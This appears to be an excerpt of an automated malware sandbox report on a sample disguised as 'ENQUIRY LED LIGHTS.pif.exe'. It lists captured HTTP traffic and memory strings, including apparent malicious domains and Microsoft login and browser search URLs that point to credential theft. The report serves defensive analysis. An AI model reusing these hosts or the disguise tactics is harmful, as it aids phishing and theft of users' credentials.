            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 12:43:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=7.8
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ve
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/builders/assets/type-builder.css?v
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/shortcodes//assets/cp-attribute-ta
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/revslider/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?v
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.j
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.mi
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js?
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/css/shortcodes
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/js/yith-wcan-s
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.3
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.m
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.m
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto-child/style.css?ver=6.6.2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/plugins.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/login-style/account-login.css?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/other/woopage.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_shop.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_wpb.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/live-search/live-search.min.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/woocommerce-shipping-progress-bar/shippin
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/bootstrap.js?ver=5.0.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.magnific-popup.min.js?ver=1.1.0
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.selectric.min.js?ver=1.9.6
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/owl.carousel.min.js?ver=2.3.4
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/webfont.js
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme-async.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/woocommerce-theme.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/style.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/imagesloaded.min.js?ver=5.0.0
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/xmlrpc.php
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.windowmart.online
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.windowmart.online/uftp/
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SearchFilterHost.exe, 00000008.00000003.2397502049.00000000082D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rankmath.com/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/BreadcrumbList
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/ListItem
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/
